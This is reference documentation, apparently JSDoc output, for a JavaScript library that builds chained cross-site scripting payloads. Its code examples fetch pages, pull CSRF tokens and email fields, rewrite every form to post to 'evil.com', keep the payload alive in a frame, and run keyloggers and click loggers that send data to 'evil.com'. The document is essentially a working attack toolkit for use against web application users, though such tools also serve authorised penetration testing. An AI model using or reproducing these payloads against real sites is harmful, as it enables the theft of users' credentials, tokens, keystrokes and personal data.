Payload

A payload object

Constructor

new Payload([parent], [render])

Used internally; use Payload.new() instead.

Parameters
parent (Payload, optional, default null): Parent payload.
render (function, optional, default null): Render function for the payload.

Methods

(static) new() → {Payload}

Returns a new Payload object.

Returns
Type
Payload

addExfiltrator(exfiltrator) → {Payload}

Add an exfiltrator to use when exfiltrate() is called. Several exfiltrators can be added, as in the example.

Example
const p = Payload.new()
    .addExfiltrator(x => fetch('https://evil.com/?' + x))
    .addExfiltrator(exfiltrators.message())
    .eval(x => 42)
    .exfiltrate()

eval(p.run())

Parameters
exfiltrator (function | Payload): Exfiltrator to use. An exfiltrator is a function that takes the data to exfiltrate and does something with it.

Returns

The new payload object in the chain.

Type
Payload

asDOM([lang]) → {Payload}

Take the pipe value, parse it as HTML or XML and set the resulting document as the pipe value.

Example
const p = Payload.new()
    .fetchText("/")
    .asDOM()
    .querySelector("title", "innerText")
    .exfiltrate()

eval(p.run())

Parameters
lang (string, optional, default "text/html"): Content type to use for the parser.

Returns

The new payload object in the chain.

Type
Payload

eval(code_or_func, …args) → {Payload}

Add a function to eval to the payload. The function takes the value in the pipe as an argument named _; the value returned by the function is then passed in the pipe.

Example
const p = Payload.new()
    .eval(() => 42)        // pipe value set to 42
    .eval(x => alert(x))   // alerts 42

eval(p.run())

Parameters
code_or_func (string | function | Payload): Code to eval on the target; if code_or_func is a function, it is converted to a string.
args (any, repeatable): Arguments to bind to the function.

Returns

The new payload object in the chain.

Type
Payload

exfiltrate() → {Payload}

Exfiltrate the current pipe value through the configured exfiltrators.

Example
const p = Payload.new()
    .addExfiltrator(exfiltrators.message())
    .eval(x => 42)
    .exfiltrate()

eval(p.run())

Returns

The new payload object in the chain.

Type
Payload

fetch(url_or_func, [options]) → {Payload}

Fetch the supplied URL; the response is then passed in the pipe.

Most of the time fetchText, fetchDOM or fetchJSON is what you need.

Examples
const p = Payload.new()
    .fetch("/")
    .eval(r => r.status)
    .exfiltrate()

eval(p.run())

const p = Payload.new()
    .eval(() => {
        return [window.API_URL, {headers: {"X-CSRF-TOKEN": window.TOKEN}}]
    })
    .fetch()
    .eval(r => r.status)
    .exfiltrate()

eval(p.run())

Parameters
url_or_func (string | function | Payload): URL to fetch, or a function that returns either a URL or an array [url, options] to pass to fetch.
options (object, optional, default {}): Options passed to fetch (ignored if url_or_func is a function).

Returns

The new payload object in the chain.

Type
Payload

fetchDOM(url_or_func, [options]) → {Payload}

Fetch the supplied URL; the response text is parsed as HTML and the resulting document is passed in the pipe.

Examples
const p = Payload.new()
    .fetchDOM("/")
    .querySelector("title", "innerText")
    .exfiltrate()

eval(p.run())

const p = Payload.new()
    .eval(() => {
        return [window.API_URL, {headers: {"X-CSRF-TOKEN": window.TOKEN}}]
    })
    .fetchDOM()
    .querySelector("title", "innerText")
    .exfiltrate()

eval(p.run())

Parameters
url_or_func (string | function | Payload): URL to fetch, or a function that returns either a URL or an array [url, options] to pass to fetch.
options (object, optional, default {}): Options passed to fetch (ignored if url_or_func is a function).

Returns

The new payload object in the chain.

Type
Payload

fetchJSON(url_or_func, [options]) → {Payload}

Fetch the supplied URL; the response text is parsed as JSON and the resulting object is passed in the pipe.

Examples
const p = Payload.new()
    .fetchJSON("/")           // pipe value is the parsed JSON object
    .eval(obj => obj.msg)
    .exfiltrate()

eval(p.run())

const p = Payload.new()
    .eval(() => {
        return [window.API_URL, {headers: {"X-CSRF-TOKEN": window.TOKEN}}]
    })
    .fetchJSON()
    .eval(obj => obj.msg)
    .exfiltrate()

eval(p.run())

Parameters
url_or_func (string | function | Payload): URL to fetch, or a function that returns either a URL or an array [url, options] to pass to fetch.
options (object, optional, default {}): Options passed to fetch (ignored if url_or_func is a function).

Returns

The new payload object in the chain.

Type
Payload

fetchText(url_or_func, [options]) → {Payload}

Fetch the supplied URL; the response text is then passed in the pipe.

Examples
const p = Payload.new()
    .fetchText("/")
    .exfiltrate()

eval(p.run())

const p = Payload.new()
    .eval(() => {
        return [window.API_URL, {headers: {"X-CSRF-TOKEN": window.TOKEN}}]
    })
    .fetchText()
    .exfiltrate()

eval(p.run())

Parameters
url_or_func (string | function | Payload): URL to fetch, or a function that returns either a URL or an array [url, options] to pass to fetch.
options (object, optional, default {}): Options passed to fetch (ignored if url_or_func is a function).

Returns

The new payload object in the chain.

Type
Payload

findBetween(before, after) → {Payload}

Take the pipe value as a string and search for the text located between the two needles; the match is returned in the pipe.

Example
const p = Payload.new()
    .fetchText("/")
    .findBetween('<title>', '</title>')
    .exfiltrate()

eval(p.run())

Parameters
before (string): String present before the targeted text.
after (string): String present after the targeted text.

Returns

The new payload object in the chain.

Type
Payload

forEach(payload) → {Payload}

Take an array from the pipe and call the payload for each element; all calls are made simultaneously.

Each payload call takes an element of the array as its argument.

Example
const p = Payload.new()
    .fetchDOM("/")
    .querySelectorAll("a", "href")
    .forEach(
        Payload.new().fetchText()
    )
    .exfiltrate()

eval(p.run())

Parameters
payload (Payload | function): Payload to run for each element of the pipe value.

Returns

The new payload object in the chain.

Type
Payload

guard() → {Payload}

Ensure that the payload only runs once; useful when the vulnerable parameter is reflected multiple times.

Example
const p = Payload.new()
    .guard()
    .eval(x => alert(x))

eval(p.run())  // calls alert()
eval(p.run())  // raises a Guard error

Returns

The new payload object in the chain.

Type
Payload

injectStyle([style_or_func]) → {Payload}

Read the pipe value as CSS and inject a style element into the page.

The pipe value is not modified.

Examples
const p = Payload.new()
    .eval(() => 'body{background:red}')
    .injectStyle()

return eval(p.run())

const p = Payload.new()
    .injectStyle('body{background:red}')

return eval(p.run())

const p = Payload.new()
    .eval(() => 'red')
    .injectStyle(color => `body{background:${color}}`)

return eval(p.run())

Parameters
style_or_func (string | function | Payload, optional, default null): If style_or_func is a string, that value is used instead of the pipe value. If style_or_func is a function, its return value is used instead of the pipe value.

Returns

The new payload object in the chain.

Type
Payload

log() → {Payload}

Log the pipe value to the console; used for debugging.

The pipe value is not modified.

Example
const p = Payload.new()
              .fetchDOM("/")
              .log()
              .querySelector("title", "innerText")
              .log()
              .exfiltrate()

eval(p.run())
Returns

The new payload object in the chain.

Type
Payload

map(payload) → {Payload}

Take an array from the pipe and call the payload for each element; all calls are made simultaneously.

Each payload call takes an element of the array as its argument.

Example
const p = Payload.new()
    .fetchDOM("/")
    .querySelectorAll("a", "href")
    .map(
        Payload.new().fetchText()
    )
    .exfiltrate()

eval(p.run())

Parameters
payload (Payload | function): Payload to run for each element of the pipe value.

Returns

The new payload object in the chain.

Type
Payload

parallel(…payloads) → {Payload}

Add multiple payloads to eval simultaneously, each with the current pipe value.

Example
const p = Payload.new()
    .parallel(
        Payload.new().fetchDOM("/"),
        Payload.new().fetchDOM("/api")
    )
    .exfiltrate()

eval(p.run())

Parameters
payloads (Payload | function, repeatable): Payloads to run simultaneously.

Returns

The new payload object in the chain.

Type
Payload

passthru(code_or_func, …args) → {Payload}

Add a function to eval to the payload. The function takes the value in the pipe as an argument named _; the value returned by the function is ignored and the previous pipe value is kept.

Example
const p = Payload.new()
    .eval(() => 42)                   // pipe value set to 42
    .passthru(v => console.log(v))    // logs the pipe value
    .exfiltrate()                     // exfiltrates 42

eval(p.run())

Parameters
code_or_func (string | function | Payload): Code to eval on the target; if code_or_func is a function, it is converted to a string.
args (any, repeatable): Arguments to bind to the function.

Returns

The new payload object in the chain.

Type
Payload

persist([callback]) → {Payload}

Try to make the payload persistent by wrapping the page content in a frame.

Example
const p = Payload.new()
    .persist(
        Payload.new().eval(d => d.location).exfiltrate()
    )

return eval(p.run())

Parameters
callback (function | Payload, optional, default null): Called each time the frame loads, with the current document.

Returns

The new payload object in the chain.

Type
Payload

postMessage([name], [target]) → {Payload}

Read the pipe value and send it to a frame using postMessage.

The pipe value is not modified.

Parameters
name (string, optional, default "top"): Name of the targeted frame.
target (string, optional, default "*"): Target origin for the message; the default "*" does not restrict the origin of the receiving frame.

Returns

The new payload object in the chain.

Type
Payload

postMultipart(callback)

Parameters
callback (*)

querySelector(selector_or_func, [attr]) → {Payload}

Take the pipe value and search for the first element matching the selector; the element is then set as the pipe value. If attr is passed, only the corresponding attribute of the element is passed in the pipe.

Examples
const p = Payload.new()                              // by default the pipe value is set to window.document
    .querySelector('title')                          // get the title element
    .passthru(el => el.innerText = 'New title')      // change the title

eval(p.run())

const p = Payload.new()
    .fetchDOM("/user/me")
    .querySelector('input[name=email]', 'value')
    .exfiltrate()

eval(p.run())

Parameters
selector_or_func (string): CSS selector.
attr (string, optional, default null): Attribute to read from the matched element.

Returns

The new payload object in the chain.

Type
Payload

querySelectorAll(selector_or_func, [attr]) → {Payload}

Take the pipe value and search for all elements matching the selector; an array of elements is then set as the pipe value. If attr is passed, only the corresponding attribute of each element is passed in the pipe.

Examples
const p = Payload.new()                              // by default the pipe value is set to window.document
    .querySelectorAll('form')                        // get all the forms
    .passthru(els => {
        els.forEach(el => el.action = '//evil.com')  // change the form destination
    })

eval(p.run())

const p = Payload.new()
    .fetchDOM("/")
    .querySelectorAll('a', 'href')     // get all the links present on the page
    .exfiltrate()

eval(p.run())

Parameters
selector_or_func (string): CSS selector.
attr (string, optional, default null): Attribute to read from each matched element.

Returns

The new payload object in the chain.

Type
Payload

redirect(url) → {Payload}

Redirect the user to a new URL.

Parameters
url (*): URL to redirect the user to.

Returns

The new payload object in the chain.

Type
Payload

regExtract(reg_or_func, [flags]) → {Payload}

Take the pipe value as a string and perform a regex search on it; the first captured group is returned in the pipe.

Example
const p = Payload.new()
    .fetchText("/")
    .regExtract('token=([a-f0-9]+)')
    .exfiltrate()

eval(p.run())

Parameters
reg_or_func (string): Regex.
flags (string, optional, default ""): Flags for the regex [gimsuy].

Returns

The new payload object in the chain.

Type
Payload

setExfiltrator(exfiltrator) → {Payload}

Set the exfiltrator to use when exfiltrate() is called.

Examples
const p = Payload.new()
    .setExfiltrator(x => fetch('https://evil.com/?' + x))
    .eval(x => 42)
    .exfiltrate()

eval(p.run())

const p = Payload.new()
    .setExfiltrator(exfiltrators.message())
    .eval(x => 42)
    .exfiltrate()

eval(p.run())

Parameters
exfiltrator (Payload | function): Exfiltrator to use. An exfiltrator is a function that takes the data to exfiltrate and does something with it.

Returns

The new payload object in the chain.

Type
Payload

startClickLogger([f]) → {Payload}

Start a click logger; the position and targeted element of each click are exfiltrated via the exfiltrators.

The pipe value is not modified.

Examples
const p = Payload.new()
    .setExfiltrator(exfiltrator.get('//evil.com'))
    .startClickLogger()

eval(p.run())

const p = Payload.new()
    .setExfiltrator(ev => console.log(ev.target))
    .startClickLogger()

eval(p.run())

Parameters
f (function, optional, default null): User-defined function to call instead of exfiltrating.

Returns

The new payload object in the chain.

Type
Payload

startKeyLogger([f]) → {Payload}

Start a key logger; each keystroke is exfiltrated via the exfiltrators.

The pipe value is not modified.

Examples
const p = Payload.new()
    .setExfiltrator(exfiltrator.get('//evil.com'))
    .startKeyLogger()

eval(p.run())

const p = Payload.new()
    .setExfiltrator(ev => console.log(ev.target))
    .startKeyLogger()

eval(p.run())

Parameters
f (function, optional, default null): User-defined function to call instead of exfiltrating.

Returns

The new payload object in the chain.

Type
Payload

wait(ms) → {Payload}

Wait before continuing the execution.

Example
const p = Payload.new()
    .fetch("/sendMail")      // long operation that continues after the response
    .wait(4000)              // wait for 4s
    .fetchText("/readMail")
    .exfiltrate()

eval(p.run())

Parameters
ms (number | Payload | function, default null): Time to wait in ms.

Returns

The new payload object in the chain.

Type
Payload